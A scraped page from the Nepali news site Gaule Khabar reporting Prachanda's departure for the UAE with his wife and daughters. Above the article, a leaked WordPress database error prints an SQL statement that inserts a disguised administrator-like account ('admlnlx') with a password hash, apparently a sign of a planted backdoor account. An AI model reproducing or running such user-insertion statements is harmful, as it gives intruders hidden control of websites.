WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BINVbHdnpgf4oU5.YaqqI6HuSRTSQz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:51:43', '', 'admlnlx', 'admlnlx')

प्रचण्ड पत्नी र दुई छोरीसहित यूएई प्रस्थान – Gaule Khabar

प्रचण्ड पत्नी र दुई छोरीसहित यूएई प्रस्थान

प्रचण्ड पत्नी र दुई छोरीसहित यूएई प्रस्थान

गाउँले न्युज, १४ साउन, काठमाडौं । सत्तारुढ दल नेपाल कम्युनिस्ट पार्टी (नेकपा) का अध्यक्ष एवं पूर्वप्रधानमन्त्री पुष्पकमल दाहाल प्रचण्ड संयुक्त अरब इमिरेट्स (युएई) प्रस्थान गरेका छन् ।
नेपाल कम्युनिश्ट पार्टी (नेकपा) अध्यक्ष प्रचण्ड मंगलबार बिहान पत्नी सीता, छोरीहरु रेणु दाहाल र गंगा दाहालसहित युएई प्रस्थान गरेका हुन् ।

नेकपा अध्यक्ष दाहालको ५ दिने युएई भ्रमणका क्रममा कुनै पनि राजनीतिक भेटघाटको कार्यक्रम तय नभएको सोमबार बसेको पार्टी सचिवालय बैठकमा जानकारी गराएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका